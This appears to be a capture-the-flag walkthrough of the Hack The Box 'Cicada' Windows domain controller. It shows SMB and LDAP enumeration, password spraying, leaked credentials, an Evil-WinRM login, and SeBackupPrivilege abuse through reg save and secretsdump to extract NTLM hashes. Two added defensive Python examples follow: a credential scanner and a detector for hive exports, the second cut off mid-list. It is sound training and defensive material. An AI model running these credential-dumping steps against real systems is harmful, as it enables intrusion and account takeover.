Nmap Enumeration
# Nmap 7.95 scan initiated Fri May 23 11:33:31 2025 as: /usr/lib/nmap/nmap -sC -sV -vv -oN nmap 10.10.11.35
Nmap scan report for 10.10.11.35
Host is up, received echo-reply ttl 127 (0.060s latency).
Scanned at 2025-05-23 11:33:31 CDT for 97s
Not shown: 988 filtered tcp ports (no-response)
PORT STATE SERVICE REASON VERSION
53/tcp open domain syn-ack ttl 127 Simple DNS Plus
88/tcp open kerberos-sec syn-ack ttl 127 Microsoft Windows Kerberos (server time: 2025-05-23 15:13:06Z)
135/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack ttl 127 Microsoft Windows netbios-ssn
389/tcp open ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=CICADA-DC.cicada.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:CICADA-DC.cicada.htb
| Issuer: commonName=CICADA-DC-CA/domainComponent=cicada
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2024-08-22T20:24:16
| Not valid after: 2025-08-22T20:24:16
| MD5: 9ec5:1a23:40ef:b5b8:3d2c:39d8:447d:db65
| SHA-1: 2c93:6d7b:cfd8:11b9:9f71:1a5a:155d:88d3:4a52:157a
|_ssl-date: TLS randomness does not represent time
445/tcp open microsoft-ds? syn-ack ttl 127
464/tcp open kpasswd5? syn-ack ttl 127
593/tcp open ncacn_http syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=CICADA-DC.cicada.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:CICADA-DC.cicada.htb
| Issuer: commonName=CICADA-DC-CA/domainComponent=cicada
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2024-08-22T20:24:16
| Not valid after: 2025-08-22T20:24:16
| MD5: 9ec5:1a23:40ef:b5b8:3d2c:39d8:447d:db65
| SHA-1: 2c93:6d7b:cfd8:11b9:9f71:1a5a:155d:88d3:4a52:157a
|_ssl-date: TLS randomness does not represent time
5985/tcp open http syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
Service Info: Host: CICADA-DC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2025-05-23T15:13:54
|_ start_date: N/A
| p2p-conficker:
| Checking for Conficker.C or higher...
| Check 1 (port 43674/tcp): CLEAN (Timeout)
| Check 2 (port 50003/tcp): CLEAN (Timeout)
| Check 3 (port 62917/udp): CLEAN (Timeout)
| Check 4 (port 40039/udp): CLEAN (Timeout)
|_ 0/4 checks are positive: Host is CLEAN or ports are blocked
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
|_clock-skew: -1h20m34s
Read data files from: /usr/share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Fri May 23 11:35:08 2025 -- 1 IP address (1 host up) scanned in 97.39 seconds
SMB Enumeration
┌──(wzwr㉿kali)-[~/Documents/htb/cicada]
└─$ crackmapexec smb 10.10.11.35 -u 'DoesNotExist' -p '' --shares
SMB 10.10.11.35 445 CICADA-DC [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.35 445 CICADA-DC [+] cicada.htb\DoesNotExist:
SMB 10.10.11.35 445 CICADA-DC [+] Enumerated shares
SMB 10.10.11.35 445 CICADA-DC Share Permissions Remark
SMB 10.10.11.35 445 CICADA-DC ----- ----------- ------
SMB 10.10.11.35 445 CICADA-DC ADMIN$ Remote Admin
SMB 10.10.11.35 445 CICADA-DC C$ Default share
SMB 10.10.11.35 445 CICADA-DC DEV
SMB 10.10.11.35 445 CICADA-DC HR READ
SMB 10.10.11.35 445 CICADA-DC IPC$ READ Remote IPC
SMB 10.10.11.35 445 CICADA-DC NETLOGON Logon server share
SMB 10.10.11.35 445 CICADA-DC SYSVOL Logon server share
┌──(wzwr㉿kali)-[~/Documents/htb/cicada]
└─$ smbclient //10.10.11.35/HR -U ''
Password for [WORKGROUP\]:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Thu Mar 14 07:29:09 2024
.. D 0 Thu Mar 14 07:21:29 2024
Notice from HR.txt A 1266 Wed Aug 28 12:31:48 2024
4168447 blocks of size 4096. 459750 blocks available
smb: \> get Notice from HR.txt
NT_STATUS_OBJECT_NAME_NOT_FOUND opening remote file \Notice
smb: \> mget Notice from HR.txt
NT_STATUS_NO_SUCH_FILE listing \Notice
smb: \> ls
. D 0 Thu Mar 14 07:29:09 2024
.. D 0 Thu Mar 14 07:21:29 2024
Notice from HR.txt A 1266 Wed Aug 28 12:31:48 2024
4168447 blocks of size 4096. 459750 blocks available
smb: \> mget "Notice from HR.txt"
Get file Notice from HR.txt? yes
getting file \Notice from HR.txt of size 1266 as Notice from HR.txt (2.9 KiloBytes/sec) (average 2.9 KiloBytes/sec)
smb: \>
Notice From HR
┌──(wzwr㉿kali)-[~/Documents/htb/cicada]
└─$ cat Notice\ from\ HR.txt
Dear new hire!
Welcome to Cicada Corp! We're thrilled to have you join our team. As part of our security protocols, it's essential that you change your default password to something unique and secure.
Your default password is: Cicada$M6Corpb*@Lp#nZp!8
To change your password:
1. Log in to your Cicada Corp account** using the provided username and the default password mentioned above.
2. Once logged in, navigate to your account settings or profile settings section.
3. Look for the option to change your password. This will be labeled as "Change Password".
4. Follow the prompts to create a new password**. Make sure your new password is strong, containing a mix of uppercase letters, lowercase letters, numbers, and special characters.
5. After changing your password, make sure to save your changes.
Remember, your password is a crucial aspect of keeping your account secure. Please do not share your password with anyone, and ensure you use a complex password.
If you encounter any issues or need assistance with changing your password, don't hesitate to reach out to our support team at support@cicada.htb.
Thank you for your attention to this matter, and once again, welcome to the Cicada Corp team!
Best regards,
Cicada Corp
The notice leaks the default password, Cicada$M6Corpb*@Lp#nZp!8. It also gives us a support email address, support@cicada.htb.
User Enumeration (RID-Brute)
┌──(wzwr㉿kali)-[~/Documents/htb/cicada]
└─$ crackmapexec smb cicada.htb -u 'doesNotExist' -p '' --rid-brute
SMB cicada.htb 445 CICADA-DC [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
SMB cicada.htb 445 CICADA-DC [+] cicada.htb\doesNotExist:
SMB cicada.htb 445 CICADA-DC [+] Brute forcing RIDs
SMB cicada.htb 445 CICADA-DC 498: CICADA\Enterprise Read-only Domain Controllers (SidTypeGroup)
SMB cicada.htb 445 CICADA-DC 500: CICADA\Administrator (SidTypeUser)
SMB cicada.htb 445 CICADA-DC 501: CICADA\Guest (SidTypeUser)
SMB cicada.htb 445 CICADA-DC 502: CICADA\krbtgt (SidTypeUser)
SMB cicada.htb 445 CICADA-DC 512: CICADA\Domain Admins (SidTypeGroup)
SMB cicada.htb 445 CICADA-DC 513: CICADA\Domain Users (SidTypeGroup)
SMB cicada.htb 445 CICADA-DC 514: CICADA\Domain Guests (SidTypeGroup)
SMB cicada.htb 445 CICADA-DC 515: CICADA\Domain Computers (SidTypeGroup)
SMB cicada.htb 445 CICADA-DC 516: CICADA\Domain Controllers (SidTypeGroup)
SMB cicada.htb 445 CICADA-DC 517: CICADA\Cert Publishers (SidTypeAlias)
SMB cicada.htb 445 CICADA-DC 518: CICADA\Schema Admins (SidTypeGroup)
SMB cicada.htb 445 CICADA-DC 519: CICADA\Enterprise Admins (SidTypeGroup)
SMB cicada.htb 445 CICADA-DC 520: CICADA\Group Policy Creator Owners (SidTypeGroup)
SMB cicada.htb 445 CICADA-DC 521: CICADA\Read-only Domain Controllers (SidTypeGroup)
SMB cicada.htb 445 CICADA-DC 522: CICADA\Cloneable Domain Controllers (SidTypeGroup)
SMB cicada.htb 445 CICADA-DC 525: CICADA\Protected Users (SidTypeGroup)
SMB cicada.htb 445 CICADA-DC 526: CICADA\Key Admins (SidTypeGroup)
SMB cicada.htb 445 CICADA-DC 527: CICADA\Enterprise Key Admins (SidTypeGroup)
SMB cicada.htb 445 CICADA-DC 553: CICADA\RAS and IAS Servers (SidTypeAlias)
SMB cicada.htb 445 CICADA-DC 571: CICADA\Allowed RODC Password Replication Group (SidTypeAlias)
SMB cicada.htb 445 CICADA-DC 572: CICADA\Denied RODC Password Replication Group (SidTypeAlias)
SMB cicada.htb 445 CICADA-DC 1000: CICADA\CICADA-DC$ (SidTypeUser)
SMB cicada.htb 445 CICADA-DC 1101: CICADA\DnsAdmins (SidTypeAlias)
SMB cicada.htb 445 CICADA-DC 1102: CICADA\DnsUpdateProxy (SidTypeGroup)
SMB cicada.htb 445 CICADA-DC 1103: CICADA\Groups (SidTypeGroup)
SMB cicada.htb 445 CICADA-DC 1104: CICADA\john.smoulder (SidTypeUser)
SMB cicada.htb 445 CICADA-DC 1105: CICADA\sarah.dantelia (SidTypeUser)
SMB cicada.htb 445 CICADA-DC 1106: CICADA\michael.wrightson (SidTypeUser)
SMB cicada.htb 445 CICADA-DC 1108: CICADA\david.orelious (SidTypeUser)
SMB cicada.htb 445 CICADA-DC 1109: CICADA\Dev Support (SidTypeGroup)
SMB cicada.htb 445 CICADA-DC 1601: CICADA\emily.oscars (SidTypeUser)
We found several users and saved their usernames to users.txt.
Found Valid Credentials!
┌──(wzwr㉿kali)-[~/Documents/htb/cicada]
└─$ crackmapexec smb cicada.htb -u users.txt -p 'Cicada$M6Corpb*@Lp#nZp!8'
SMB cicada.htb 445 CICADA-DC [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
SMB cicada.htb 445 CICADA-DC [-] cicada.htb\Administrator:Cicada$M6Corpb*@Lp#nZp!8 STATUS_LOGON_FAILURE
SMB cicada.htb 445 CICADA-DC [-] cicada.htb\Guest:Cicada$M6Corpb*@Lp#nZp!8 STATUS_LOGON_FAILURE
SMB cicada.htb 445 CICADA-DC [-] cicada.htb\john.smoulder:Cicada$M6Corpb*@Lp#nZp!8 STATUS_LOGON_FAILURE
SMB cicada.htb 445 CICADA-DC [-] cicada.htb\sarah.dantelia:Cicada$M6Corpb*@Lp#nZp!8 STATUS_LOGON_FAILURE
SMB cicada.htb 445 CICADA-DC [+] cicada.htb\michael.wrightson:Cicada$M6Corpb*@Lp#nZp!8
cicada.htb\michael.wrightson:Cicada$M6Corpb*@Lp#nZp!8
SMB Enumeration Again
┌──(wzwr㉿kali)-[~/Documents/htb/cicada]
└─$ crackmapexec smb cicada.htb -u 'michael.wrightson' -p 'Cicada$M6Corpb*@Lp#nZp!8' --shares
SMB cicada.htb 445 CICADA-DC [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
SMB cicada.htb 445 CICADA-DC [+] cicada.htb\michael.wrightson:Cicada$M6Corpb*@Lp#nZp!8
SMB cicada.htb 445 CICADA-DC [+] Enumerated shares
SMB cicada.htb 445 CICADA-DC Share Permissions Remark
SMB cicada.htb 445 CICADA-DC ----- ----------- ------
SMB cicada.htb 445 CICADA-DC ADMIN$ Remote Admin
SMB cicada.htb 445 CICADA-DC C$ Default share
SMB cicada.htb 445 CICADA-DC DEV
SMB cicada.htb 445 CICADA-DC HR READ
SMB cicada.htb 445 CICADA-DC IPC$ READ Remote IPC
SMB cicada.htb 445 CICADA-DC NETLOGON READ Logon server share
SMB cicada.htb 445 CICADA-DC SYSVOL READ Logon server share
This time, we are able to read NETLOGON and SYSVOL.
┌──(wzwr㉿kali)-[~/Documents/htb/cicada]
└─$ smbclient //10.10.11.35/SYSVOL -U 'cicada.htb\michael.wrightson'
Password for [CICADA.HTB\michael.wrightson]:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Thu Aug 22 12:40:07 2024
.. D 0 Thu Mar 14 06:08:56 2024
cicada.htb Dr 0 Thu Mar 14 06:08:56 2024
4168447 blocks of size 4096. 479243 blocks available
smb: \> RECURSE ON
smb: \> PROMPT OFF
smb: \> mget *
NT_STATUS_ACCESS_DENIED listing \cicada.htb\DfsrPrivate\*
getting file \cicada.htb\Policies\{2480865A-F9E0-4995-B568-987D80F2ADEF}\GPT.INI of size 59 as cicada.htb/Policies/{2480865A-F9E0-4995-B568-987D80F2ADEF}/GPT.INI (0.3 KiloBytes/sec) (average 0.3 KiloBytes/sec)
getting file \cicada.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\GPT.INI of size 23 as cicada.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/GPT.INI (0.1 KiloBytes/sec) (average 0.2 KiloBytes/sec)
getting file \cicada.htb\Policies\{6AC1786C-016F-11D2-945F-00C04fB984F9}\GPT.INI of size 23 as cicada.htb/Policies/{6AC1786C-016F-11D2-945F-00C04fB984F9}/GPT.INI (0.1 KiloBytes/sec) (average 0.2 KiloBytes/sec)
getting file \cicada.htb\Policies\{2480865A-F9E0-4995-B568-987D80F2ADEF}\Machine\comment.cmtx of size 554 as cicada.htb/Policies/{2480865A-F9E0-4995-B568-987D80F2ADEF}/Machine/comment.cmtx (2.6 KiloBytes/sec) (average 0.8 KiloBytes/sec)
getting file \cicada.htb\Policies\{2480865A-F9E0-4995-B568-987D80F2ADEF}\Machine\Registry.pol of size 160 as cicada.htb/Policies/{2480865A-F9E0-4995-B568-987D80F2ADEF}/Machine/Registry.pol (0.8 KiloBytes/sec) (average 0.8 KiloBytes/sec)
getting file \cicada.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Registry.pol of size 2788 as cicada.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Registry.pol (9.3 KiloBytes/sec) (average 2.6 KiloBytes/sec)
getting file \cicada.htb\Policies\{6AC1786C-016F-11D2-945F-00C04fB984F9}\MACHINE\comment.cmtx of size 554 as cicada.htb/Policies/{6AC1786C-016F-11D2-945F-00C04fB984F9}/MACHINE/comment.cmtx (2.6 KiloBytes/sec) (average 2.6 KiloBytes/sec)
getting file \cicada.htb\Policies\{6AC1786C-016F-11D2-945F-00C04fB984F9}\MACHINE\Registry.pol of size 160 as cicada.htb/Policies/{6AC1786C-016F-11D2-945F-00C04fB984F9}/MACHINE/Registry.pol (0.8 KiloBytes/sec) (average 2.4 KiloBytes/sec)
getting file \cicada.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Microsoft\Windows NT\SecEdit\GptTmpl.inf of size 1874 as cicada.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Microsoft/Windows NT/SecEdit/GptTmpl.inf (5.5 KiloBytes/sec) (average 2.9 KiloBytes/sec)
getting file \cicada.htb\Policies\{6AC1786C-016F-11D2-945F-00C04fB984F9}\MACHINE\Microsoft\Windows NT\SecEdit\GptTmpl.inf of size 5342 as cicada.htb/Policies/{6AC1786C-016F-11D2-945F-00C04fB984F9}/MACHINE/Microsoft/Windows NT/SecEdit/GptTmpl.inf (16.9 KiloBytes/sec) (average 4.7 KiloBytes/sec)
smb: \> exit
┌──(wzwr㉿kali)-[~/Documents/htb/cicada]
└─$ tree cicada.htb
cicada.htb
├── DfsrPrivate
├── Policies
│ ├── {2480865A-F9E0-4995-B568-987D80F2ADEF}
│ │ ├── GPT.INI
│ │ ├── Machine
│ │ │ ├── Registry.pol
│ │ │ └── comment.cmtx
│ │ └── User
│ ├── {31B2F340-016D-11D2-945F-00C04FB984F9}
│ │ ├── GPT.INI
│ │ ├── MACHINE
│ │ │ ├── Microsoft
│ │ │ │ └── Windows NT
│ │ │ │ └── SecEdit
│ │ │ │ └── GptTmpl.inf
│ │ │ ├── Registry.pol
│ │ │ └── Scripts
│ │ │ ├── Shutdown
│ │ │ └── Startup
│ │ └── USER
│ │ ├── Documents & Settings
│ │ └── Scripts
│ │ ├── Logoff
│ │ └── Logon
│ └── {6AC1786C-016F-11D2-945F-00C04fB984F9}
│ ├── GPT.INI
│ ├── MACHINE
│ │ ├── Microsoft
│ │ │ └── Windows NT
│ │ │ └── SecEdit
│ │ │ └── GptTmpl.inf
│ │ ├── Registry.pol
│ │ ├── Scripts
│ │ │ ├── Shutdown
│ │ │ └── Startup
│ │ └── comment.cmtx
│ └── USER
│ ├── Documents & Settings
│ └── Scripts
│ ├── Logoff
│ └── Logon
└── scripts
33 directories, 10 files
Nothing interesting…
WinRM Enumeration
┌──(wzwr㉿kali)-[~/Documents/htb/cicada]
└─$ evil-winrm -i cicada.htb -u 'michael.wrightson' -p 'Cicada$M6Corpb*@Lp#nZp!8'
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
Error: An error of type WinRM::WinRMAuthorizationError happened, message is WinRM::WinRMAuthorizationError
Error: Exiting with code 1
We cannot connect remotely with these credentials either.
LDAP dump
┌──(wzwr㉿kali)-[~/Documents/htb/cicada]
└─$ ldapdomaindump -u "cicada.htb\\michael.wrightson" -p 'Cicada$M6Corpb*@Lp#nZp!8' ldap://10.10.11.35
[*] Connecting to host...
[*] Binding to host
[+] Bind OK
[*] Starting domain dump
[+] Domain dump finished
Domain Users
Looking at domain_users.html, we found an interesting description:
In it, the credentials david.orelious:aRt$Lp#7t*VQ!3 were found!
Domain users by group
Emily Oscars might be the high-value target for us: she can connect remotely to the machine and has backup privileges.
David Enumeration Again
SMB Enumeration
┌──(wzwr㉿kali)-[~/Documents/htb/cicada]
└─$ crackmapexec smb 10.10.11.35 -u 'david.orelious' -p 'aRt$Lp#7t*VQ!3' --shares
SMB 10.10.11.35 445 CICADA-DC [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.35 445 CICADA-DC [+] cicada.htb\david.orelious:aRt$Lp#7t*VQ!3
SMB 10.10.11.35 445 CICADA-DC [+] Enumerated shares
SMB 10.10.11.35 445 CICADA-DC Share Permissions Remark
SMB 10.10.11.35 445 CICADA-DC ----- ----------- ------
SMB 10.10.11.35 445 CICADA-DC ADMIN$ Remote Admin
SMB 10.10.11.35 445 CICADA-DC C$ Default share
SMB 10.10.11.35 445 CICADA-DC DEV READ
SMB 10.10.11.35 445 CICADA-DC HR READ
SMB 10.10.11.35 445 CICADA-DC IPC$ READ Remote IPC
SMB 10.10.11.35 445 CICADA-DC NETLOGON READ Logon server share
SMB 10.10.11.35 445 CICADA-DC SYSVOL READ Logon server share
Good, we can read the DEV share now!
┌──(wzwr㉿kali)-[~/Documents/htb/cicada]
└─$ smbclient //10.10.11.35/DEV -U 'cicada.htb\david.orelious'
Password for [CICADA.HTB\david.orelious]:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Thu Mar 14 07:31:39 2024
.. D 0 Thu Mar 14 07:21:29 2024
Backup_script.ps1 A 601 Wed Aug 28 12:28:22 2024
4168447 blocks of size 4096. 478846 blocks available
smb: \> mget *
Get file Backup_script.ps1? y
getting file \Backup_script.ps1 of size 601 as Backup_script.ps1 (2.0 KiloBytes/sec) (average 2.0 KiloBytes/sec)
smb: \> exit
Backup Script?
┌──(wzwr㉿kali)-[~/Documents/htb/cicada]
└─$ cat Backup_script.ps1
$sourceDirectory = "C:\smb"
$destinationDirectory = "D:\Backup"
$username = "emily.oscars"
$password = ConvertTo-SecureString "Q!3@Lp#M6b*7t*Vt" -AsPlainText -Force
$credentials = New-Object System.Management.Automation.PSCredential($username, $password)
$dateStamp = Get-Date -Format "yyyyMMdd_HHmmss"
$backupFileName = "smb_backup_$dateStamp.zip"
$backupFilePath = Join-Path -Path $destinationDirectory -ChildPath $backupFileName
Compress-Archive -Path $sourceDirectory -DestinationPath $backupFilePath
Write-Host "Backup completed successfully. Backup file saved to: $backupFilePath"
We found another set of credentials: emily.oscars:Q!3@Lp#M6b*7t*Vt. Luckily, she is the high-value target we just mentioned!
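The three credential leaks so far (the default password in the HR notice on an anonymously readable share, the password in david.orelious's AD description, and the hardcoded PSCredential in Backup_script.ps1) are the same hygiene failure: secrets sitting in text that a low-privileged account can read. The scanner below is an added example, not part of the original writeup; it flags those patterns in files pulled from shares or in user description fields. The sample texts are constructed from the artifacts in this post, and the rule names and scan()/scan_all() functions are this example's own.

```python
"""Flag plaintext credentials in text pulled from shares or AD attributes.

Added example, not part of the original writeup. The three samples below are
constructed from the artifacts in this post (HR notice, a user description and
Backup_script.ps1); rule names and the scan()/scan_all() functions are our own.
"""
import re

# Each rule is (name, regex). Every regex has a 'secret' group; 'user' is optional.
RULES = [
    # Prose such as "Your default password is: X" (HR notice, AD description).
    ("prose-default-password",
     re.compile(r"password\s+is:?\s*(?P<secret>\S+)", re.IGNORECASE)),
    # PowerShell SecureString built from a string literal.
    ("powershell-securestring",
     re.compile(r'ConvertTo-SecureString\s+["\'](?P<secret>[^"\']+)["\']\s+-AsPlainText',
                re.IGNORECASE)),
    # "user:password" pairs, common in description fields and notes.
    ("user-colon-password",
     re.compile(r"(?P<user>[a-z][\w.-]+):(?P<secret>[^\s:]{8,})", re.IGNORECASE)),
]
# A nearby $username = "..." assignment tells us whose secret a script holds.
USERNAME_RE = re.compile(r'\$user(?:name)?\s*=\s*["\']([^"\']+)["\']', re.IGNORECASE)


def looks_like_password(candidate):
    """Cheap filter that drops prose words and URLs: length plus character-class mix."""
    return (len(candidate) >= 8
            and any(c.isalpha() for c in candidate)
            and any(c.isdigit() for c in candidate)
            and any(not c.isalnum() for c in candidate))


def scan(text, source, owner=None):
    """Return one finding dict per rule hit in `text` that passes looks_like_password.

    `owner` is the account the text belongs to (e.g. the user whose description it is);
    a $username assignment inside the text takes precedence over it.
    """
    hint = USERNAME_RE.search(text)
    default_user = hint.group(1) if hint else owner
    findings = []
    for name, rx in RULES:
        for m in rx.finditer(text):
            secret = m.group("secret").rstrip(".,;")   # strip sentence punctuation
            if not looks_like_password(secret):
                continue
            user = m.groupdict().get("user") or default_user
            findings.append({"source": source, "rule": name,
                             "user": user, "secret": secret})
    return findings


# Constructed samples modelled on the writeup's artifacts.
HR_NOTICE = """Dear new hire!
As part of our security protocols, it's essential that you change your default password.
Your default password is: Cicada$M6Corpb*@Lp#nZp!8
Remember, your password is a crucial aspect of keeping your account secure.
"""
AD_DESCRIPTION = "Just in case I forget, my password is aRt$Lp#7t*VQ!3"   # constructed wording
BACKUP_SCRIPT = '''$sourceDirectory = "C:\\smb"
$username = "emily.oscars"
$password = ConvertTo-SecureString "Q!3@Lp#M6b*7t*Vt" -AsPlainText -Force
$credentials = New-Object System.Management.Automation.PSCredential($username, $password)
'''


def scan_all():
    """Scan the three samples; returns findings in sample order."""
    results = []
    for source, text, owner in [("HR/Notice from HR.txt", HR_NOTICE, None),
                                ("AD description", AD_DESCRIPTION, "david.orelious"),
                                ("DEV/Backup_script.ps1", BACKUP_SCRIPT, None)]:
        results.extend(scan(text, source, owner))
    return results


if __name__ == "__main__":
    for f in scan_all():
        print(f"[{f['rule']}] {f['source']}: user={f['user']} secret={f['secret']}")
```

Run it over everything an unauthenticated or low-privileged user can read (share contents, SYSVOL, the description attribute of every user) and each hit is a credential to rotate.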
WinRM with emily
┌──(wzwr㉿kali)-[~/Documents/htb/cicada]
└─$ crackmapexec winrm 10.10.11.35 -u 'emily.oscars' -p 'Q!3@Lp#M6b*7t*Vt'
SMB 10.10.11.35 5985 CICADA-DC [*] Windows Server 2022 Build 20348 (name:CICADA-DC) (domain:cicada.htb)
HTTP 10.10.11.35 5985 CICADA-DC [*] http://10.10.11.35:5985/wsman
WINRM 10.10.11.35 5985 CICADA-DC [+] cicada.htb\emily.oscars:Q!3@Lp#M6b*7t*Vt (Pwn3d!)
┌──(wzwr㉿kali)-[~/Documents/htb/cicada]
└─$ evil-winrm -i cicada.htb -u 'emily.oscars' -p 'Q!3@Lp#M6b*7t*Vt'
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Documents> whoami
cicada\emily.oscars
*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Documents> type ../Desktop/user.txt
2c3e7e1e316bfc32597e9401505d2b39
*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Documents>
Post Exploitation
Recall that emily is the high-value target: she has remote connection privileges and belongs to the Backup Operators group, which usually implies she has backup privileges.
Privileges Check
*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Documents> whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ============================== =======
SeBackupPrivilege Back up files and directories Enabled
SeRestorePrivilege Restore files and directories Enabled
SeShutdownPrivilege Shut down the system Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Documents>
Indeed, she does have SeBackupPrivilege. We can try to abuse this to obtain the machine's NTLM hashes.
Abuse
*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Documents> reg save hklm\sam C:\Users\emily.oscars.CICADA\Documents\sam.hive
The operation completed successfully.
*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Documents> reg save hklm\system C:\Users\emily.oscars.CICADA\Documents\system.hive
The operation completed successfully.
*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Documents>
Then we transfer sam.hive and system.hive to our Kali machine.
┌──(wzwr㉿kali)-[~/Documents/htb/cicada]
└─$ impacket-secretsdump -sam sam.hive -system system.hive LOCAL
Impacket v0.12.0.dev1 - Copyright 2023 Fortra
[*] Target system bootKey: 0x3c2b033757a49110a9ee680b46e8d620
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:2b87e7c93a3e8a0ea4a581937016f341:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[-] SAM hashes extraction for user WDAGUtilityAccount failed. The account doesn't have hash information.
[*] Cleaning up...
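From the defender's side, the steps above (a Backup Operators member receiving SeBackupPrivilege at logon, then reg save of the SAM and SYSTEM hives, then offline extraction) leave a recognisable trail in the Security log: event 4672 lists the special privileges assigned at logon, and event 4688 (with command-line auditing enabled) records the reg.exe invocation. The detection below is an added example, not part of the original writeup; the events are constructed to mirror this session, EXPECTED_BACKUP_ACCOUNTS is a hypothetical allowlist, and the field names follow the EventData of those two event IDs.

```python
"""Detect the SeBackupPrivilege -> SAM/SYSTEM hive export pattern in Security events.

Added example, not from the original writeup. Events are constructed dicts shaped
like the EventData of Security log records 4672 and 4688; in practice they would
come from a SIEM or a Get-WinEvent export. EXPECTED_BACKUP_ACCOUNTS is hypothetical.
"""
import re

# Privileges that let a non-admin read any file, SAM and SYSTEM included.
SENSITIVE_PRIVS = {"SeBackupPrivilege", "SeRestorePrivilege"}
# Accounts that legitimately hold them (hypothetical allowlist for this example).
EXPECTED_BACKUP_ACCOUNTS = {"svc_backup"}

# reg.exe exporting one of the hives that together yield local account hashes.
HIVE_DUMP_RE = re.compile(
    r"\breg(?:\.exe)?\s+save\s+(?:hklm|hkey_local_machine)\\(sam|system|security)\b",
    re.IGNORECASE,
)


def classify(event):
    """Return a finding message for one suspicious event, or None."""
    user = event.get("SubjectUserName", "")
    if event["EventID"] == 4672:
        # PrivilegeList is whitespace-separated in the raw event.
        held = set(event.get("PrivilegeList", "").split()) & SENSITIVE_PRIVS
        # Machine accounts (CICADA-DC$) and known backup accounts are expected to hold these.
        if held and not user.endswith("$") and user not in EXPECTED_BACKUP_ACCOUNTS:
            return f"4672: {user} logged on with {', '.join(sorted(held))}"
    elif event["EventID"] == 4688:
        m = HIVE_DUMP_RE.search(event.get("CommandLine", ""))
        if m:
            return f"4688: {user} exported HKLM\\{m.group(1).upper()} via reg save"
    return None


def detect(events):
    """Run both rules and escalate when they fire for the same account.

    Returns (severity, message) tuples in input order, plus one 'high' finding per
    account that both held a backup privilege and exported a hive.
    """
    findings, priv_users, dump_users = [], set(), set()
    for ev in events:
        msg = classify(ev)
        if msg is None:
            continue
        findings.append(("medium", msg))
        (priv_users if ev["EventID"] == 4672 else dump_users).add(ev["SubjectUserName"])
    for user in sorted(priv_users & dump_users):
        findings.append(("high", f"{user}: backup privilege plus SAM/SYSTEM export; "
                                 "treat local account hashes as compromised"))
    return findings


# Constructed events mirroring the session in this writeup.
SAMPLE_EVENTS = [
    {"EventID": 4672, "SubjectUserName": "CICADA-DC$",
     "PrivilegeList": "SeSecurityPrivilege SeBackupPrivilege SeRestorePrivilege"},
    {"EventID": 4672, "SubjectUserName": "emily.oscars",
     "PrivilegeList": "SeBackupPrivilege SeRestorePrivilege SeShutdownPrivilege"},
    {"EventID": 4688, "SubjectUserName": "emily.oscars",
     "NewProcessName": "C:\\Windows\\System32\\reg.exe",
     "CommandLine": "reg save hklm\\sam C:\\Users\\emily.oscars.CICADA\\Documents\\sam.hive"},
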